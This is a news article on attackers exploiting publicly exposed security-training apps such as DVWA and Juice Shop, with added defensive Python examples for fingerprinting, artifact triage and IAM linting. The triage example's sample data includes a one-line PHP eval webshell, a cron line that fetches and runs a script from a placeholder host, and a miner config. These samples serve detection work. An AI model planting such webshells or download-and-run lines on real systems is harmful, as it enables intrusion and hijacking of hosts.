Pentest tools left online are allowing hackers to exploit Fortune 500 firms


Attackers are exploiting intentionally vulnerable penetration-testing and security-training apps that were mistakenly exposed to the public internet, and in some cases using them as a foothold into the cloud accounts behind them. Exposed instances included some belonging to major tech firms such as Cloudflare, F5, and Palo Alto Networks.

New research from offensive security research firm Pentera focuses on ten popular training tools, including Damn Vulnerable Web Application (DVWA), OWASP Juice Shop, Hackazon, and bWAPP.


All of these tools are deliberately built with weaknesses, for teaching, internal pentesting practice, and product demonstrations. But when such an application is deployed in a real cloud environment with a privileged identity attached, it becomes an easy entry point for attackers.

Pentera warned that the flaws can give threat actors control of the compromised hosts and “pathways for lateral movement into sensitive internal systems,” especially when companies violate the “principle of least privilege” or fail to properly sandbox test systems.

Nearly 2,000 exposed training apps found online

Pentera said it found “clear evidence that attackers are exploiting these flaws in the wild – to deploy crypto miners, plant webshells or pivot to sensitive systems.”

Researchers identified 1,926 exposed instances of these vulnerable applications on the public web, often deployed on AWS, Google Cloud Platform, and Microsoft Azure with overly privileged IAM (Identity and Access Management) roles.

Of these, 1,626 were verified as unique servers, and nearly 60% ran on enterprise-owned infrastructure in those major cloud platforms.

The discovery, documented in a security report, began during a routine cloud security assessment, when Noam Yaffe, a senior security researcher at Pentera, spotted an exposed Hackazon instance running directly in production.

This made him question “how many other vulnerable training applications are publicly exposed, and how can an attacker exploit them?”


He then examined 10 widely used training apps, many of which had known remote code execution paths.

“To assess the risk beyond surface exposure, I built a Python tool to automate exploitation using known vectors to achieve remote code execution,” Yaffe said.

Pentera said the results were “alarming,” with 109 exposed credential sets uncovered, many tied to overprivileged identities.

In some cases, Yaffe said he found cloud access that could enable the reading and writing of sensitive data, interaction with container registries, deployment or destruction of compute resources, and even administrator-level cloud access.

“In multiple cases, we found active secrets (GitHub tokens, Slack keys, Docker Hub creds), proprietary source code, and real user data.”

“What began as a harmless lab could lead directly to an organization’s crown jewels.”

Noam Yaffe, senior security researcher, Pentera

To scale the hunt, Yaffe built an open-source tool called SigInt, which he describes as “a Python-based autonomous reconnaissance framework that uses LLMs to intelligently fingerprint applications and discover their exposed instances across the internet.”

He said the tool helped the research expand to thousands of deployments.
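The fingerprinting step described above can be reproduced without an LLM for the handful of apps the research names, simply by matching each app's default page title. The following is an added example, not Pentera's SigInt tool and not code from the article; the signature strings are assumptions based on the apps' default pages, and the HTTP responses it scans are constructed (TEST-NET addresses), so it runs offline.

```python
"""Fingerprint exposed security-training apps from raw HTTP responses.

Added example, not Pentera's SigInt tool and not part of the original
article. Signature strings are assumptions drawn from the apps' default
page titles; check them against a local copy of each app before use.
"""
import re

# App name -> regex expected in the <title> (or body) of the default page.
# These signatures are assumptions, not taken from the article.
SIGNATURES = {
    "DVWA": re.compile(r"Damn Vulnerable Web Application", re.I),
    "OWASP Juice Shop": re.compile(r"OWASP Juice Shop", re.I),
    "bWAPP": re.compile(r"\bbWAPP\b", re.I),
    "Hackazon": re.compile(r"\bHackazon\b", re.I),
}

TITLE_RE = re.compile(r"<title>(.*?)</title>", re.I | re.S)


def parse_http_response(raw: str) -> dict:
    """Split a raw HTTP/1.x response into status line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"status": lines[0], "headers": headers, "body": body}


def fingerprint(raw: str) -> dict:
    """Identify a known training app from one response ("app" is None if no match)."""
    resp = parse_http_response(raw)
    title_match = TITLE_RE.search(resp["body"])
    title = title_match.group(1).strip() if title_match else ""
    app = None
    for name, pattern in SIGNATURES.items():
        if pattern.search(title) or pattern.search(resp["body"]):
            app = name
            break
    return {"app": app, "title": title,
            "server": resp["headers"].get("server", "")}


def find_exposed_training_apps(responses: dict) -> list:
    """Return (url, app, server) for every response that matches a signature."""
    findings = []
    for url, raw in responses.items():
        fp = fingerprint(raw)
        if fp["app"]:
            findings.append((url, fp["app"], fp["server"]))
    return findings


# Constructed sample responses (TEST-NET addresses), not real scan data.
SAMPLE_RESPONSES = {
    "http://203.0.113.10/login.php": (
        "HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
        "Content-Type: text/html\r\n\r\n"
        "<html><head><title>Login :: Damn Vulnerable Web Application (DVWA)"
        "</title></head><body>...</body></html>"
    ),
    "http://203.0.113.11:3000/": (
        "HTTP/1.1 200 OK\r\nX-Powered-By: Express\r\n"
        "Content-Type: text/html\r\n\r\n"
        "<!DOCTYPE html><html><head><title>OWASP Juice Shop</title></head>"
        "<body></body></html>"
    ),
    "http://203.0.113.12/": (
        "HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n\r\n"
        "<html><head><title>Corporate Intranet</title></head></html>"
    ),
}

if __name__ == "__main__":
    for url, app, server in find_exposed_training_apps(SAMPLE_RESPONSES):
        print(f"{url}: {app} (server: {server or 'unknown'})")
```

Run against your own egress IP ranges, the same matcher flags the lab boxes that should never have been reachable; a title match is only a first pass, so confirm hits by hand before treating them as exposures.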

Screenshot: researchers accessing an account’s Secrets Manager service on AWS. Image by Pentera.

The results led him to discover that some of the exposed applications were linked to major tech firms, including Cloudflare, F5, and Palo Alto Networks. The companies received the findings and have since fixed the issues, according to the researchers.


In-the-wild usage detected

The research also found signs of real-world exploitation already underway.

“Out of the 616 discovered DVWA instances, around 20% were found to contain artifacts deployed by malicious actors. These weren’t isolated incidents; they represented an organized, ongoing exploitation campaign,” Yaffe said.

The artifacts included an XMRig cryptocurrency miner, a persistence script designed to maintain access, and a PHP webshell used to run commands and steal credentials.
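A defender triaging one of these instances wants to tell attacker artifacts apart from the app's own deliberately vulnerable code, since DVWA's command-injection exercise also passes request input to shell_exec() and would trip a naive webshell rule. The following is an added example, not Pentera's code and not from the article: it compares each file against a baseline manifest of the pristine release (path to SHA-256) and runs indicator rules only on files that are new or modified. The indicator regexes and all file contents are constructed stand-ins, not real DVWA source or real malware.

```python
"""Triage a training-app webroot for post-exploitation artifacts.

Added example, not Pentera's code and not part of the original article.
Only files that are new or changed relative to a baseline manifest of the
pristine release are classified, so the app's own intentionally vulnerable
source is not reported as a webshell. Contents below are constructed.
"""
import hashlib
import re

# Indicator rules (assumptions, tuned for the artifacts the research describes:
# PHP webshells, XMRig miners and cron / download-and-run persistence).
WEBSHELL_EXEC = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I)
WEBSHELL_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
MINER = re.compile(r"xmrig|stratum\+(tcp|ssl)://|cryptonight|randomx", re.I)
DOWNLOAD_AND_RUN = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b")
_CRON_FIELD = r"(?:\*(?:/\d+)?|\d+(?:-\d+)?)"
CRON_LINE = re.compile(rf"^\s*{_CRON_FIELD}(?:\s+{_CRON_FIELD}){{4}}\s+\S", re.M)


def classify_artifact(text: str) -> set:
    """Tag a file's contents as webshell / miner / persistence (possibly several)."""
    tags = set()
    if WEBSHELL_EXEC.search(text) and WEBSHELL_INPUT.search(text):
        tags.add("webshell")
    if MINER.search(text):
        tags.add("miner")
    if DOWNLOAD_AND_RUN.search(text) or CRON_LINE.search(text):
        tags.add("persistence")
    return tags


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def triage(webroot: dict, baseline: dict) -> dict:
    """Return {path: tags} for new or modified files that trip an indicator.

    webroot: path -> bytes as found on the host; baseline: path -> sha256 of
    the pristine release. Files whose hash matches the baseline are skipped.
    """
    findings = {}
    for path, data in webroot.items():
        if baseline.get(path) == sha256_hex(data):
            continue  # unchanged part of the known app, whatever it contains
        tags = classify_artifact(data.decode("utf-8", errors="replace"))
        if tags:
            findings[path] = tags
    return findings


# Constructed sample files: a simplified stand-in for DVWA's command-injection
# exercise, plus attacker drops of the three kinds the research describes.
LOW_PHP = (b"<?php\n$target = $_REQUEST['ip'];\n"
           b"$cmd = shell_exec('ping -c 4 ' . $target);\necho $cmd;\n")
INDEX_PHP = b"<?php include 'dvwa/includes/dvwaPage.inc.php'; ?>\n"
PRISTINE = {
    "index.php": INDEX_PHP,
    "vulnerabilities/exec/source/low.php": LOW_PHP,
}
BASELINE = {path: sha256_hex(data) for path, data in PRISTINE.items()}

COMPROMISED_WEBROOT = {
    **PRISTINE,
    "hackable/uploads/.c.php": b"<?php @eval($_POST['x']); ?>",
    "hackable/uploads/.x.sh": (
        b"#!/bin/sh\n(crontab -l 2>/dev/null; echo '*/5 * * * * "
        b"curl -s http://198.51.100.7/m.sh | sh') | crontab -\n"
    ),
    "hackable/uploads/config.json":
        b'{"url": "stratum+tcp://198.51.100.7:3333", "algo": "rx/0"}',
}

if __name__ == "__main__":
    for path, tags in triage(COMPROMISED_WEBROOT, BASELINE).items():
        print(f"{path}: {', '.join(sorted(tags))}")
```

The baseline is the practical part: keep the hash manifest of the version you actually deployed, because a version you cannot verify cannot be diffed against, and an unknown file under an upload directory is suspect even before any rule fires.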

Yaffe said exposed training apps are likely being abused for crypto-mining, persistent access, lateral movement, and data theft, warning that “organized threat actors have recognized this attack surface and are systematically exploiting it.”

Pentera urged organizations to treat training environments as real attack surfaces: maintain a complete inventory of cloud resources, apply least-privilege permissions, isolate test environments from production networks, and scan for exposed services using the same tools attackers rely on.
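The least-privilege recommendation is concrete enough to check mechanically: what turns RCE on a throwaway lab box into the secrets-manager and administrator-level access described above is the IAM policy attached to the instance or pod. The following is an added example, not Pentera's code and not from the article: a small linter for IAM policy documents that flags wildcard actions, wildcard resources, denylist-style NotAction/NotResource statements, and high-impact actions that are not scoped to specific ARNs. The policies are constructed, and the list of high-impact actions is an assumption rather than an AWS-published list.

```python
"""Lint an IAM policy document for the overprivilege the research describes.

Added example, not Pentera's code and not from the original article. The
policies below are constructed; HIGH_IMPACT is an assumption, a starting
point rather than an authoritative list.
"""
import json

# Actions that let a foothold read secrets, mint credentials or spawn compute.
HIGH_IMPACT = {
    "iam:PassRole", "iam:CreateAccessKey", "iam:AttachRolePolicy",
    "iam:PutRolePolicy", "sts:AssumeRole", "secretsmanager:GetSecretValue",
    "ssm:GetParameter", "ec2:RunInstances", "lambda:UpdateFunctionCode",
}


def _as_list(value):
    """IAM accepts a string or a list in Statement/Action/Resource; normalise."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def policy_findings(policy: dict) -> list:
    """Return one human-readable finding per risky pattern in each Allow statement."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt or "NotResource" in stmt:
            findings.append(f"statement {i}: NotAction/NotResource is a denylist; "
                            "everything not listed is allowed")
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        resource_wildcard = "*" in resources
        for action in actions:
            if action == "*":
                findings.append(f"statement {i}: Action '*' grants every API call")
            elif action.endswith(":*"):
                findings.append(f"statement {i}: Action '{action}' grants the whole service")
            elif action in HIGH_IMPACT and resource_wildcard:
                findings.append(f"statement {i}: high-impact action '{action}' "
                                "is not scoped to specific resource ARNs")
        if resource_wildcard:
            findings.append(f"statement {i}: Resource '*' is not scoped to specific ARNs")
    return findings


def lint_policy_json(text: str) -> list:
    """Same check, starting from the JSON text as stored in IAM."""
    return policy_findings(json.loads(text))


# Constructed policies. OVERPRIVILEGED is what an instance role on a lab box
# too often looks like; SECRETS_READER is narrower but still unscoped; SCOPED
# is a least-privilege alternative. A self-contained training app usually
# needs no cloud permissions at all.
OVERPRIVILEGED = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}
SECRETS_READER = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow",
                   "Action": "secretsmanager:GetSecretValue",
                   "Resource": "*"}],
}
SCOPED = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow",
                   "Action": ["s3:GetObject"],
                   "Resource": "arn:aws:s3:::training-lab-assets/*"}],
}

if __name__ == "__main__":
    for name, policy in [("OVERPRIVILEGED", OVERPRIVILEGED),
                         ("SECRETS_READER", SECRETS_READER), ("SCOPED", SCOPED)]:
        print(name, policy_findings(policy) or "no findings")
```

Feed it the inline and attached policies of every role that an instance profile, ECS task or Kubernetes service account can assume, and treat any finding on a role attached to a training app as a blocker: the app needs an isolated network and, in most cases, no cloud identity at all.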

Commenting on the findings, Nivedita Murthy, a senior security consultant at Black Duck, added that training apps like DVWA and OWASP Juice Shop are widely used because they are free and effective for teaching secure coding and pentesting, but that they receive little oversight.

“There is limited oversight of these applications, as any tests conducted on them could reveal vulnerabilities that teams may assume are intentional rather than malicious.”

Nivedita Murthy, senior security consultant, Black Duck

She recommended that companies track which versions are deployed, keep verified versions internally rather than relying on ad-hoc downloads, confirm that discovered vulnerabilities are documented by tool creators, and run the apps only in isolated environments to mitigate the impact of any compromise.

